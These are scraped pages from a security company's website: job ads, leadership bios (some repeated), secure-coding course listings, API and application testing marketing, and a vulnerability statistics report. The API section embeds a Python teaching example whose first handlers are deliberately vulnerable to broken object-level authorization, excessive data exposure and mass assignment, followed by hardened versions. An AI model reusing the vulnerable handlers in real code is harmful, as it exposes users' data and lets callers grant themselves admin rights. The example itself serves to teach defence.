Job Description: Edgescan is seeking a Sales Development Representative (SDR) to generate new opportunities and pipeline for Account Executives (AE). As an SDR, you will manage outreach, prospecting and lead generation in your territory to ensure we drive business opportunities through the whole sales funnel. As the first line of communication with prospects, ideal SDRs have a strong understanding of the sales process, excelling at researching leads, starting new relationships, and setting our AEs up for success. You should be a quick learner with strong communication skills and have the ability to showcase our offerings in a compelling way.
Every potential customer is an opportunity for you to boost top-line revenue growth, customer acquisition levels, and profitability.

Key Responsibilities:
- Develop and execute cold calling and email campaign strategies to qualify potential customers as a match for our SaaS platform.
- Meet specific weekly and monthly goals for qualified opportunities to ensure company revenue objectives are met, and report to the Revenue Team.
- Build long-term, trusting relationships with prospects to qualify leads as sales opportunities.
- Proactively seek new business opportunities in the market.
- Set up meetings or calls between (prospective) customers and account executives.

Basic Qualifications:
- Strong communication skills, both oral and written, in addition to excellent listening skills and a positive, engaging phone presence.
- 1-2 years of experience in a sales role (outbound lead generation) in a fast-paced environment.
- Bachelor’s degree or equivalent years of experience required.
- Self-starter, strong work ethic, and hungry, with a drive for achievement.
- A team player who shares information and expertise, and promotes team effectiveness by facilitating and building on the ideas of others.

Additional Qualifications:
- Experience in a start-up SaaS environment and working with enterprises is a plus.
- System knowledge in Salesforce, Outreach, ZoomInfo, or similar.
- Prior experience as a sales development rep with a track record of achieving sales quotas.

Traits:
- Customer/prospect empathy.
- Technical aptitude.
- Consultative; ability and desire to drive value for customers based on unique needs.
- Collaborative; partner across functions.
- Intellectually curious; driven to expand cybersecurity domain and professional expertise.
- Metrics-driven; ability to translate customer needs into achievable goals and operate well in a data-driven environment.

Opportunities for growth and development within Edgescan include the possibility of moving into an account executive role or leading a sales team in the future. Previous Sales Development Representatives at Edgescan have also gone on to find success in other departments within the company. APPLY NOW

### Platform Support Technician

Job Description: We are currently looking for a Platform Support Technician to take point in our industry leading customer support function. You will be an integral part of the Operations team, working closely with managers and team leads, ensuring our customer first approach is maintained throughout.

Position Details: The customer support function is part of our Security Operations team, where we strive to improve the security posture of our customers’ assets. Supported by Operations, our platform support team acts as the first point of contact for any queries that users of our platform may have, and can speedily triage these queries by being a champion for the user, escalate where required, and ensure an efficient and happy journey through the life of the customer query.

You will:
- Be the first point of contact for our diverse customer base, via email and phone.
- Triage support queries and escalate to the relevant team where required.
- Become a champion for the user by proactively identifying defects or enhancements in key areas of the user platform.
- Take responsibility to ensure a successful customer support experience.
- Be flexible to support customers in Europe and the US.
- Work as part of a dynamic team in a collaborative environment.
- Assist in and suggest any review, update, testing, and implementation of new processes and procedures.

You may be fit for this role if you have:
- Excellent inter-personal skills.
- Excellent English written and oral communication skills.
- A customer service orientation.
- Ability to manage and prioritize multiple tasks.
- Ability to work on your own initiative and within a larger team.
- Ability to learn and see common trends in data.
- Reasonable flexibility with working hours (some out-of-hours involvement in tasks may be required).
- Knowledge of and interest in Information Security.
- Eligibility to work in the EU.

Nice to haves:
- B.Sc. or M.Sc. in Computer Science / Information Technology or equivalent Third Level Qualification, or a demonstration of similar experience.
- A passion for Information Security.
- Software development or scripting skills.
- Third level qualification.
- Previous experience in a technical role.
- Previous experience in a customer support role.

Eligibility: Candidates must be authorised to be employed in the EU. APPLY NOW

### Careers

Career Opportunities

Benefits: Highly Competitive Salary; Flexible Working Options; Training/Education Funding; Health Insurance; Team Social Nights/Events; Plenty of Caffeine, Snacks and Beer!

With tens of thousands of web applications, APIs, and endpoints to manage, we are often looking for talented people to join our highly dynamic team. We are highly invested in the careers of our team. If you are an engineer or a software dev with a penchant for security, we would love to hear from you. Edgescan is a great place to work, whether in the office or remote. Our corporate office is located in Dublin and our United States office is in New York City. We offer great benefits and a warm and supportive environment for our international and diverse workforce. Currently No Openings. Please reach out to careers@edgescan.com for any questions.

Sales Development Representative: We are currently looking for a Sales Development Representative to generate new opportunities for Account Executives (AE). As an SDR, you will manage outreach, prospecting and lead generation to ensure we drive business opportunities through the whole sales funnel. APPLY TODAY

Solutions Engineer: Edgescan is seeking a Solutions Engineer to support our account team and partners. You will serve as an expert for the Edgescan platform, including Penetration Testing as a Service, Web Application and API Testing, Network Vulnerability Management, and Attack Surface Management.
APPLY TODAY

Enterprise Account Executive: Edgescan is seeking an Enterprise Account Executive to support the growth of our enterprise accounts. The Enterprise Account Executive will be responsible for driving revenue growth within our target accounts, managing the sales process from lead generation to deal closure. APPLY TODAY

Platform Support Technician: We are currently looking for a Platform Support Technician to take point in our industry leading customer support function. You will be an integral part of the Operations team, working closely with managers and team leads, ensuring our customer first approach is maintained throughout. APPLY TODAY

### Contact Us

Call Us: Ireland: +353 (0) 1 681 5330; Europe: +44 20 3855 5592; US: +1 332 245 3220

Email Us: General: info@edgescan.com; Sales: sales@edgescan.com

"I have been an Edgescan customer for over five years and continue to be impressed by the Edgescan team hitting all the notes so well: innovation, quality, integration, scale, cost, customer support, responsiveness, and true partnership." Fortune 1000 Global Media Corporation

### Leadership

Meet Our Executive Team and Board of Directors

Executive Team: Our executive team has a total of almost 70 years of combined experience among them, with a range of diverse skills that include cyber security, accounting, software development and engineering, just to name a few. Each member of our executive team was hand picked by our founder, Eoin Keary. His goal is to find the best people who can help his company become a cybersecurity juggernaut.

Eoin Keary, CEO & Founder. ABOUT EOIN KEARY: Eoin is a veteran of the cyber security industry with 20 years of software development and security experience. Eoin previously held the Global Vice Chair position at the OWASP foundation, and led development of the OWASP Testing and Code Review Guides.
Eoin also led an EMEA penetration testing team, leading global enterprise cyber security engagements with a big 4 consultancy for 5 years prior to founding BCC Risk Advisory Ltd and Edgescan in 2011. Eoin was named OWASP Person of the year for 2015 and 2016 for contributions to the industry, and awarded the Tech Excellence Rising Star Award in 2015. Rahim Jina COO & Co-Founder Linkedin Twitter ABOUT RAHIM JINA Rahim has been involved in the cybersecurity industry in various guises. Prior to co-founding Edgescan, Rahim was enjoying the California sun as head of security for a cloud-based VOIP provider based in Los Angeles. Moving back to his native Dublin in 2013 was a difficult decision at the time, but full focus and energy was needed in building and growing Edgescan, which is well placed as part of the exciting tech and cyber scene in Ireland. With a B.Sc from Trinity College Dublin and an M.Sc from Dublin City University, Rahim is also a former Big 4 consultant, where he first met Eoin. Rahim regularly speaks (and is sometimes listened to) at conferences and has been involved with and contributed to organisations such as OWASP for too long. At Edgescan, Rahim is responsible for operational excellence across the entire organisation. Eoin Twohig CFO Linkedin ABOUT EOIN TWOHIG Eoin is a chartered accountant with more than 10 years of experience across a range of industries including SaaS, Gaming, and Financial Services. As CFO, Eoin is responsible for Edgescan’s finance operations. Brian Heavey CTO Linkedin ABOUT BRIAN HEAVEY Brian has been building software for over 20 years and has led teams developing products with combined revenues of over $1B. Brian is passionate about hiring and developing leaders, understanding and implementing new technologies and enhancing client capability and experience. At Edgescan, he has implemented industry best practice with constant enhancement and innovation. 
Outside of work Brian coaches youths and children in sports as well as running and refusing to call time on his hurling career. Owen Mooney CA Linkedin ABOUT OWEN MOONEY Owen is the technical visionary behind Edgescan and oversees the development team responsible for delivering the Edgescan SaaS platform. Owen has a varied engineering career, delivering software and security products on time and under budget across global industries. Owen attended Trinity College with an MSc in Computer Science and a BA Mod in Theoretical Physics. His academic work involved hacking GPUs to emulate ray tracing techniques in real-time, and using computational methods to calculate the electronic structure of carbon nanotubes and related materials. When not sitting in front of his screen, Owen can be found playing bass guitar and video games. Jim Manico Strategic Technical Advisor Linkedin Twitter ABOUT JIM MANICO Jim Manico is the founder of Manicode Security, where he trains software developers on secure coding and security engineering. He is also an investor/advisor for 10Security, Aiya, MergeBase, Nucleus Security, KSOC, and Inspectiv. Jim is a frequent speaker on secure software practices, is a member of the Java Champion community, and is the author of “Iron-Clad Java: Building Secure Web Applications” from Oracle Press. Jim also volunteers for the OWASP foundation as the project lead for the OWASP Application Security Verification Standard and the OWASP Cheatsheet Series. Never compromise threat protection. REQUEST DEMO PRODUCT VIDEO Board of Directors The best way to describe our board of directors is: Four People, One Vision. Each member of the board has proven to be as driven and dedicated to the success of Edgescan. They all share a combined passion for entrepreneurship and cyber security. This mutually shared goal has allowed them to lead our company to where it is now, while at the same time plotting a course for the future. 
Bernie Waldron Non-executive Chairman ABOUT BERNIE WALDRON Bernie is an international leader and experienced mentor with over 30 years of non-executive, executive and management experience, spanning Private Equity, Venture Capital, UK PLCs, and global blue-chip corporations. Bernie has personal responsibility for company or divisional revenues from $3bn per annum. Bernie adds value to any B2B organisation, particularly in Technology-Enabled, SaaS, IT Services or Business Services sectors, or where clarifying strategy, building sales capability, expanding internationally, or executing M&A is pivotal to growth. Eoin Keary CEO & Founder Linkedin Twitter ABOUT EOIN KEARY Eoin is a veteran of the cyber security industry with 20 years of software development and security experience. Eoin previously held the Global Vice Chair position at the OWASP foundation, and led development of the OWASP Testing and Code Review Guides. Eoin also led an EMEA penetration testing team, leading global enterprise cyber security engagements with a big 4 consultancy for 5 years prior to founding BCC Risk Advisory Ltd and Edgescan in 2011. Eoin was named OWASP Person of the year for 2015 and 2016 for contributions to the industry, and awarded the Tech Excellence Rising Star Award in 2015. Rahim Jina COO & Co-Founder Linkedin Twitter ABOUT RAHIM JINA Rahim has been involved in the cybersecurity industry in various guises. Prior to co-founding Edgescan, Rahim was enjoying the California sun as head of security for a cloud-based VOIP provider based in Los Angeles. Moving back to his native Dublin in 2013 was a difficult decision at the time, but full focus and energy was needed in building and growing Edgescan, which is well placed as part of the exciting tech and cyber scene in Ireland. With a B.Sc from Trinity College Dublin and an M.Sc from Dublin City University, Rahim is also a former Big 4 consultant, where he first met Eoin. 
Rahim regularly speaks (and is sometimes listened to) at conferences and has been involved with and contributed to organisations such as OWASP for too long. At Edgescan, Rahim is responsible for operational excellence across the entire organisation.

Leo Casey, Non-executive Chairman. ABOUT LEO CASEY: Leo leads BGF’s Dublin office, with responsibility for identifying, investing in, and supporting businesses throughout the Republic of Ireland with a requirement for longer-term and patient capital to support growth plans. Based in Dublin, Leo has more than 17 years of experience and knowledge of the Irish mid-market, helping Irish owner-managed and family businesses secure growth capital and unlock value.

### TRAINING COURSES: Master the Fundamentals of Secure Coding

Free Training Courses: Master the Fundamentals of Secure Coding with Jim Manico. Watch for more Manicode training courses coming soon!

Join Jim Manico, advisor to Edgescan and principal instructor at Manicode Security, for an essential webinar on Server-Side Request Forgery (SSRF), a critical vulnerability affecting modern web applications and APIs. Watch Now

Ensure your code is secure from the top ten vulnerabilities discovered in the wild by Edgescan in 2023:
1. SQL injection
2. File path traversal
3. Cross-site scripting (stored)
4. Malicious file upload
5. Brute forcing possible
6. PHP unsupported version detection
7. Out-of-band resource load (HTTP)
8. Server-side template injection
9. Password submitted using GET method
10. Sensitive file(s) disclosure

AI-Powered Secure Coding: Harnessing AI for Better Software Development (ON-DEMAND RECORDING, watch now). COURSE 8 DESCRIPTION: Join Jim Manico, advisor to Edgescan and principal instructor at Manicode Security, for a cutting-edge webinar on leveraging artificial intelligence to generate more secure, efficient code.
Introduction to Symmetric Cryptography (ON-DEMAND RECORDING, watch now). COURSE 7 DESCRIPTION: In this on-demand training session, dive into the world of symmetric cryptography and learn how to safeguard your sensitive information. Led by Jim Manico, a renowned cybersecurity expert and advisor at Edgescan, this comprehensive course will equip you with the knowledge and skills needed to master secure communication.

Navigating the Web's Hazards: A Deep Dive into Out-of-Band Resource Load, Server-Side Template Injection, Unsafe Password Practices, and Sensitive File Disclosure (ON-DEMAND RECORDING, watch now). COURSE 6 DESCRIPTION: Join us for a training session where we unravel some of the web’s most overlooked yet critical security vulnerabilities. Our talk is crafted for developers, security professionals, and anyone keen on understanding and fortifying web security. This session is especially relevant for those involved in secure coding and application security.

Crack the Code: Defending Against Brute Forcing (ON-DEMAND RECORDING, watch now). COURSE 5 DESCRIPTION: This training module is designed for developers to understand and counteract brute force attacks on web applications. Brute force attacks, where attackers methodically try numerous combinations to crack passwords, usernames, or other security credentials, pose a significant threat to web security. This module aims to equip developers with practical knowledge and tools to implement effective defenses against such attacks.

File Upload Security (ON-DEMAND RECORDING, watch now). COURSE 4 DESCRIPTION: Allowing users to upload files to your web or API application can be inherently risky. This module focuses on understanding the various attacks associated with file upload features and other file I/O-intensive functionalities. It’s crucial to recognize the potential threats and implement robust security measures to mitigate them.
Stored but Not Secure: Defending Against Cross-site Scripting ON-DEMAND RECORDING Watch now COURSE 3 DESCRIPTION Cross-site Scripting (XSS) is a persistent peril that exposes web applications to script injection attacks. Our strategy to protect against this vulnerability should encompass rigorous output encoding, HTML sanitization and input filtering. Also, by adopting robust Content Security Policy (CSP) headers, diligent input validation, and embracing modern security-focused frameworks, we can fortify our applications against XSS, ensuring they remain both functional and resilient in the ever-evolving landscape of web security. Finding Your Way: Mitigating File Path Traversal Risk ON-DEMAND RECORDING Watch now COURSE 2 DESCRIPTION File path traversal, or directory traversal, is a treacherous adversary, capable of granting attackers unauthorized access to sensitive files. Our mission is to shield against this threat through stringent input validation and more, ensuring that user-provided file paths remain confined within their intended directory structures. Combining this with access control measures, such as ACLs and permissions, fortifies our defenses, guiding us safely through the complex terrain of file system security. The Snake in the Query: Preventing SQL Injection ON-DEMAND RECORDING Watch Now COURSE 1 DESCRIPTION SQL injection is a notorious vulnerability that we, as security practitioners and developers, must tackle head-on. It arises when attackers manipulate user inputs to execute malicious SQL queries, endangering our data integrity. To thwart these attacks, we must embrace prepared statements and parameterized queries, techniques that treat user inputs as data, not executable code, thus forming a robust defense against this venomous threat. Jim Manico Your instructor Jim Manico is the founder of Manicode Security, where he trains software developers on secure coding and security engineering. 
He is also an investor/advisor for 10Security, Aiya, MergeBase, Nucleus Security, KSOC, and Inspectiv. Jim is a frequent speaker on secure software practices, is a member of the Java Champion community, and is the author of “Iron-Clad Java: Building Secure Web Applications” from Oracle Press. Jim also volunteers for the OWASP foundation as the project lead for the OWASP Application Security Verification Standard and the OWASP Cheatsheet Series. Visit www.manicode.com to schedule an in-depth training course with Jim and crew.

### About Edgescan

Edgescan offers a continuous security testing and unified exposure management SaaS platform that manages thousands of assets for businesses large and small in a wide variety of industries across the globe. Founded in 2011 by Eoin Keary, Edgescan has offices in Dublin and New York City. We empower our clients to detect, prioritize, monitor, and fix security weaknesses for all web-facing and internal systems including web applications, websites, mobile apps, servers, firewalls, VPNs, or VoIP services. Our OSCP- and CREST-certified experts validate every vulnerability discovered on an assessment, creating a multi-step verification process for a solution that’s highly accurate and virtually free of false positives.

EOIN KEARY | Founder, CEO

What We Do

Recently, I came across a “Cyber Defense” award that was offered in 195 different categories. It’s a stunning reminder of just how many different and diversified solutions there are available in our industry. Some are unproven, while others are effective when deployed properly. But with so many firms offering so many answers, it’s important to ask a more fundamental question: Why do we do what we do? Here’s why we developed Edgescan, and why we think it’s a decent solution for organizations of all types that want to strengthen their security posture...

Scanning alone doesn’t work. Scanning software for security vulnerabilities makes sense, and it can be effective.
But there’s risk on both sides: the scanner may miss threats because they’re lurking in unusual places, or hiding in plain sight with atypical characteristics. Or the tool might flag vulnerabilities that aren’t real—false positives. Edgescan is built to combine scanning’s breadth and range of coverage with a hybrid validation approach. All flagged vulnerabilities are automatically assessed against our proprietary data lake, which after 14 years of work on behalf of our clients is more like an ocean. Then there’s the human element: our team of expert penetration testers validate vulnerabilities to further ensure they are real threats to your systems.

Risk-rated, noise suppressed. Our validation approach is like noise-suppression. Your list of vulnerabilities is free of false positives, meaning your security team will not waste time and money on phony threats and non-issues. This creates an efficiency that delivers real value to your organization, and it’s supercharged by another dimension of the Edgescan platform: risk-rating. “Which vulnerabilities should we fix today?” is the essential question for any security team, and even if they’re not wasting time on false positives, they may be wasting it on relatively minor issues while more dire threats go unaddressed. Luckily, your list of real vulnerabilities will also be risk-rated in the Edgescan dashboard, so your staff can attack the most serious threats first.

Siloed vulnerability intelligence isn’t intelligent.
Hackers do not care which layer of your stack they exploit, and a serious vulnerability—where bad actors can gain entry to your systems and escalate their privileges to cause wider havoc—might be lurking anywhere. For years, separate vulnerability-management tools that are specialized for different layers of the stack have been the standard, but getting these tools (and the staff who operate them) to collaborate effectively is costly, time-consuming, and may still leave gaps where you lack visibility. You need a comprehensive view across the full stack. The Edgescan platform combines network, host, and web-application vulnerability in a single dashboard, with validated and risk-rated results that in aggregate provide a single source of truth.

Old-school penetration testing was clunky. In the traditional model, firms seek out qualified penetration testers, draw up contracts, bring them onboard their systems, and await results delivered in the form of a PDF. It’s slow, clunky, and expensive, and in many cases it does not capitalize on the client’s existing knowledge of their attack surface and the threat matrix. Why not integrate your pen testing with your vulnerability management? A detailed map of your attack surface and diagnostics on already known threats will allow testers to go deeper and focus their time and attention on the most complex issues that require a human touch. With the Edgescan platform, you can test and retest vulnerabilities on-demand instead of waiting on a contractor, and when you contact our support team, you can speak with an OSCP- or CREST-certified penetration tester at any time.

95% CUSTOMER RETENTION: Edgescan drives significant improvement to global organizations’ continuous exposure management and security testing programs. We cut through the noise to deliver validated risk and proven exploits to our returning happy clients. See for yourself...

RECOMMENDED BY REVIEWERS: 98% of Gartner Peer Insight reviewers would recommend Edgescan.

### Edgescan War Room - Videos providing expert advice on managing security programs, covering DevSecOps, DevOps, Development

Edgescan War Room. Conversation. Vision. Strategy. Tactics.
Welcome to the Edgescan War Room. Edgescan War Room is a series of informal conversations between Eoin Keary, CEO and Founder of Edgescan, and Jim Manico, Edgescan Strategic Technical Advisor and Founder of Manicode. Here is a collection of videos bringing together innovative approaches and best practices to secure your internet-facing assets, covering DevSecOps, DevOps, Security Operations, Secure Development, and more. Our goal is to provide expert advice on managing robust security programs, incorporating services like penetration testing, external attack surface management, and risk-based vulnerability management. Watch a video and see how we address the challenges of building and maintaining a robust security program in a fun and light-hearted manner. Join us on this proactive journey to safeguard your online presence and stay ahead of evolving security risks. Watch Now

- NEW! Episode 6: Artificial Intelligence in Security and the Importance of Training
- Episode 5: 2024 Vulnerability Statistics Preview and How to Think About Prioritizing Them
- Episode 4: Cyber Acronyms 101
- Episode 3: Scaling with PTaaS, ASM and Risk-based VM Solutions and Thoughts on What Happens WHEN You Get Breached
- Episode 2: Pragmatic Observations on EASM, Data Quality, and the Future AI
- Episode 1: Can ChatGPT, AI and Machine Learning Improve Cybersecurity Performance?

### API Security Testing

Rapid analysis. Immediate risk triage.

Data Shows that API Risk is Increasing… Not Going Away. Actual deployment data from Edgescan customers reveals a 320% rise in API vulnerability in 2022 – that is a shocking number. And to top it off, Gartner research indicates that API abuse will become the most frequent attack vector. Don’t let your company make a news headline. Time to get your security under control.

Know Your APIs. Scan Your APIs. Don’t confuse API security configuration assessment with traditional vulnerability scanning – it is different.
Using multi-layer probing technology, the Edgescan API discovery engine uses asynchronous port scanning to identify and then monitor network changes. It automatically discovers active API endpoints across your entire attack surface and profiles the discovered endpoints.

API Data Sheet: In-depth Approach to Securing APIs (Download)

API Discovery Journey

Complete cloud coverage: Discover hidden and rogue APIs across your cloud providers including AWS, Microsoft Azure, GCP, VMware NSX, and Cisco ACI. Our multi-layered approach to discovering APIs results in a confidence interval describing whether an API is actually present. API discovery works by applying specialised probing traffic to each endpoint and evaluating the results; APIs are detected based on the responses to the probes sent.

Securing APIs is as easy as one, two, three.
1. API Discovery: Identify known and rogue APIs on each host across your IP/CIDR ranges using patented, multi-layer, production-safe API probing technology.
2. API Vulnerability Scanning: Detects security vulnerabilities with accuracy to keep pace with your ever-changing IT landscape.
3. API Penetration Testing: A manual penetration test is conducted on every business-critical API.

Key Benefits of API Security Testing
- API discovery across your global ecosystem: Identify known and rogue APIs on each host across your IP/CIDR ranges using patented, multi-layer, production-safe API probing technology.
- Accurately monitor & track changes: Map out entire APIs to ensure a rigorous assessment and detect changes by consuming OpenAPI/Swagger/GraphQL files.
- Proactive & continuous API protection: Establish unfettered monitoring and defense against botnets, advanced threats, and DDoS with on-demand and real-time alerts.
- Complete cloud coverage: Discover hidden and rogue APIs across your cloud providers including AWS, Microsoft Azure, GCP, VMware NSX, and Cisco ACI.
High Risk API Vulnerabilities Discovered by Edgescan

Broken Object-Level Authorization: APIs often expose endpoints handling object identifiers. Any function that accepts user input and uses it to access a data source can create an object-level access control issue, widening the attack surface. Object-level authorization checks should be carried out on all such functions.

Broken User Authentication: Attackers often take advantage of incorrectly applied authentication mechanisms. They may compromise an authentication token or exploit flaws in implementation to pose as another user, either on a one-time basis or permanently. If the system’s ability to identify the client/user is compromised, so is the overall API’s security.

Excessive Data Exposure: Developers often rely on the client side to filter the data before displaying it to the user. This can create serious security issues—data must always be filtered at the server side, and only the relevant information should be delivered to the client side.

Lack of Resources and Rate Limiting: APIs often don’t restrict the number or size of resources that the client/user can request. This can impact the performance of the API server, resulting in Denial of Service (DoS), and exposes authentication endpoints to brute-force attacks.

Broken Function-Level Authorization: Authorization flaws often result from overly complex access control policies, or from no clear separation between regular and administrative functions. Attackers can exploit these vulnerabilities to gain access to a user’s resources or perform administrative functions.

Mass Assignment: Mass assignment typically results from binding client-provided data (e.g. JSON) to a data model without filtering the properties against an allowlist. Attackers can modify object properties in a number of ways—they can explore API endpoints, read the documentation, guess object properties, or provide additional properties through request payloads.
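Three of the weaknesses above (broken object-level authorization, excessive data exposure and mass assignment) share one fix pattern: the server, not the client, decides which object a caller may touch and which properties may cross the boundary in each direction. The following is an added illustration, not Edgescan code and not any customer's API. The `Request` type, the `accounts` table and its rows are constructed for the example, and an authentication layer is assumed to have already set `req.user`. Each handler is shown in its vulnerable form and then hardened; data access is parameterized SQL throughout, which also removes the injection route an interpolated id would open.

```python
"""Added example (not Edgescan code): account read/update handlers, vulnerable
then hardened against BOLA, excessive data exposure and mass assignment.
Storage is an in-memory SQLite table with constructed rows so it runs offline."""
import sqlite3
from dataclasses import dataclass, field

PUBLIC_FIELDS = ("id", "owner", "balance")    # what a client may ever read
WRITABLE_FIELDS = ("email",)                   # what a client may ever write
ALL_FIELDS = ("id", "owner", "balance", "email", "is_admin", "ssn")  # the model


class Forbidden(Exception):
    """Authorization or input-contract failure; would map to HTTP 403/400."""


@dataclass
class Request:
    user: str                 # principal set by the (assumed) authentication layer
    path_id: int              # object id parsed from the URL path
    body: dict = field(default_factory=dict)   # parsed JSON body


def fresh_store() -> sqlite3.Connection:
    """Constructed sample data (hypothetical accounts, not real data)."""
    db = sqlite3.connect(":memory:")
    db.row_factory = sqlite3.Row
    db.execute("CREATE TABLE accounts (id INTEGER PRIMARY KEY, owner TEXT,"
               " balance INTEGER, email TEXT, is_admin INTEGER, ssn TEXT)")
    db.executemany("INSERT INTO accounts VALUES (?,?,?,?,?,?)", [
        (101, "alice", 2500, "alice@example.test", 0, "***-**-1234"),
        (102, "bob", 80, "bob@example.test", 0, "***-**-5678"),
    ])
    return db


# --- vulnerable handlers ------------------------------------------------------
def get_account_vulnerable(db, req: Request) -> dict:
    # BOLA: any authenticated caller can read any id; excessive data exposure:
    # the whole row (ssn, is_admin included) is handed to the client to "filter".
    row = db.execute("SELECT * FROM accounts WHERE id = ?", (req.path_id,)).fetchone()
    return dict(row) if row else {}


def update_account_vulnerable(db, req: Request) -> dict:
    # Mass assignment: every body key that matches a model column is bound,
    # so a client can set is_admin or balance. (Column names come from the
    # fixed ALL_FIELDS tuple, so the f-string itself is not an injection.)
    for col, val in req.body.items():
        if col in ALL_FIELDS:
            db.execute(f"UPDATE accounts SET {col} = ? WHERE id = ?", (val, req.path_id))
    return get_account_vulnerable(db, req)


# --- hardened handlers --------------------------------------------------------
def _load_owned(db, req: Request) -> sqlite3.Row:
    # Object-level authorization inside the query: the row must exist AND belong
    # to the caller. One error for both cases avoids an id-enumeration oracle.
    row = db.execute("SELECT * FROM accounts WHERE id = ? AND owner = ?",
                     (req.path_id, req.user)).fetchone()
    if row is None:
        raise Forbidden("account not accessible")
    return row


def get_account_hardened(db, req: Request) -> dict:
    row = _load_owned(db, req)
    return {k: row[k] for k in PUBLIC_FIELDS}   # server-side field filtering


def update_account_hardened(db, req: Request) -> dict:
    _load_owned(db, req)
    unexpected = set(req.body) - set(WRITABLE_FIELDS)
    if unexpected:  # reject rather than silently drop, so the contract is explicit
        raise Forbidden(f"properties not writable: {sorted(unexpected)}")
    for col in WRITABLE_FIELDS:  # identifier taken from the constant allowlist
        if col in req.body:
            db.execute(f"UPDATE accounts SET {col} = ? WHERE id = ? AND owner = ?",
                       (req.body[col], req.path_id, req.user))
    return get_account_hardened(db, req)


def denied(handler, db, req: Request) -> bool:
    """True when the handler refuses the request (used when checking behaviour)."""
    try:
        handler(db, req)
    except Forbidden:
        return True
    return False
```

Because `_load_owned` folds ownership into the `WHERE` clause and returns the same error for a missing id and for someone else's id, the hardened endpoint can neither be used to read other users' records nor to discover which ids exist, and the read and write allowlists are the only places a reviewer needs to look to know what the API exposes.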
Security Misconfiguration: Security misconfiguration often results from inadequate default configurations, ad-hoc or incomplete configurations, misconfigured HTTP headers or inappropriate HTTP methods, insufficiently restrictive Cross-Origin Resource Sharing (CORS), open cloud storage, or error messages that contain sensitive information.

Injection: Injection flaws (including SQL injection, NoSQL injection, and command injection) involve data that is sent to an interpreter from an untrusted source via a command or query. Attackers can send malicious data to trick the interpreter into executing dangerous commands, or to access data without the necessary authorization.

### Application Security Testing (AST)

Application Security Testing: Industrial-scale coverage. Eliminate false positives.

Visibility is Key

Today’s enterprises deploy a wide range of systems, servers, cloud and web applications, accessible from any location. Visibility of such systems in terms of security posture is of vital importance. The lack of management and not understanding what to manage (no visibility) results in assets which are an easy target for hackers and may result in a data breach. Visibility is key to maintaining a secure posture. The Edgescan Attack Surface Management solution provides that visibility in many ways, from metrics, asset profiling and continuous vulnerability detection to verified vulnerability intelligence and risk-based results.

Industrial-scale Coverage

Every web application assessed gets the “full stack” treatment, meaning the application undergoes penetration testing and automated vulnerability assessment. Each and every exposure that is discovered is assessed for severity and for whether it is listed as a vulnerability currently being exploited on the public Internet, and is validated to determine if it is exploitable and a real risk.
This makes prioritization much easier. Each vulnerability is verified by our team of certified experts to ensure that only REAL threats are escalated. Edgescan customers never experience false positives or false alarms.

Vulnerability scanning on-demand when you want it, and scheduled as often as you need

Use the vulnerability scanning and validation service as much as you like – unlimited testing and retesting of discovered issues, as often as needed to verify mitigation, at no additional cost – providing peace of mind. Edgescan can also alert you if a new vulnerability is discovered via SMS, email, Slack or Webhook.

Complete visibility to expose weaknesses and risk across your deployed applications and web services. Edgescan provides verified vulnerability data into the existing CI/CD toolset, so DevOps teams have the critical data they need earlier in the software development lifecycle.

Key Benefits of Application Security Testing

- Hybrid approach to assessments: Applications are assessed using the platform’s automated tools combined with human expertise and cyber analytics, resulting in high accuracy and industrial-scale coverage, eliminating false positives.
- Integrates with existing tools: Edgescan provides verified vulnerability data into your existing CI/CD tool stack so developers and operations teams have the critical data they need earlier in the software development lifecycle. Seamlessly integrates alerts and notifications with your installed third-party systems for complete visibility across your tool stack.
- Customizable reporting: Enables auditing and trend analysis by tracking closed vulnerabilities, vulnerability age, posture status, and many other security metrics. Also create API-based reporting for GRC integrations per asset. No more sifting through pages of data and clunky PDFs.
- Unlimited and on-demand vulnerability assessments & retesting: Unlimited testing and retesting of discovered issues, as often as needed to verify mitigation, at no additional cost – providing peace of mind.

### Vulnerability Statistics Report

2025 Vulnerability Statistics Report: Celebrating a Decade of Security Insights

Welcome to the 10th anniversary edition of the Edgescan Vulnerability Statistics Report! Drawing from our analysis of thousands of security assessments and penetration tests conducted globally throughout 2024, this landmark report delivers authoritative insights into the cybersecurity landscape across hundreds of organizations and industries worldwide. Don't miss the latest data in the 2025 Mid-Year Snapshot!

Our 2025 report delves deeper than ever before into critical metrics that matter to security professionals. We explore Risk Density patterns across network/device and application layers, uncover complex vulnerabilities that automated tools consistently miss, and evaluate the real-world effectiveness of today's leading vulnerability scoring methodologies, including EPSS, CISA KEV, CVSS, and our proprietary EVSS system. This year's findings reveal significant industry variances in vulnerability remediation efficiency, with software companies achieving the fastest mean time to remediate (63 days) while construction sector organizations lag considerably (104 days). We've also identified concerning patterns in vulnerability management, with larger enterprises leaving 45.4% of discovered vulnerabilities unresolved within a 12-month period—predominantly within the network/device layer.
Key findings from the 2025 report include:

- Across the full stack, more than 33% of discovered vulnerabilities were of critical or high severity
- SQL Injection (CWE-89) remains the most common critical web application vulnerability, continuing a trend since 2022
- Application / API, high/critical severity: average MTTR 74.3 days
- Device/network vulnerabilities, high/critical severity: average MTTR 54.8 days
- In 2024, a record-breaking 40,009 Common Vulnerabilities and Exposures (CVEs) were published
- The CISA Known Exploited Vulnerabilities (KEV) catalog contained 1,238 vulnerabilities by the end of 2024, with 185 added during the year
- 768 CVEs were publicly reported as exploited for the first time in the wild in 2024, representing 2% of all discovered vulnerabilities and a 20% increase from 2023

For a decade, our Vulnerability Statistics Report has served as the definitive resource for security professionals seeking to understand emerging threats and optimize their defensive strategies. Download the complete 2025 report today and gain the actionable intelligence you need to strengthen your organization's security posture.

> Some rare vulnerabilities cause outsized damage when exploited—"intensive rather than extensive risk." No single risk scoring system is sufficient. EPSS, CISA KEV, CVSS, and SSVC offer valuable but sometimes contradictory guidance. Production patching remains difficult, reflected in our MTTR statistics. Continuous assessment visibility is essential. Internal networks show alarming security gaps, with vulnerabilities compounding across the technology stack. CVEs from 2015 are still being discovered and exploited by modern malware. Attack Surface Management is critical—too many sensitive systems remain exposed due to poor visibility. This report helps prioritize what matters across industries, because not all vulnerabilities are equal threats.
>
> — Eoin Keary, CEO & Founder

Previous Editions of the Report

Overview of the Edgescan Vulnerability Stats Report

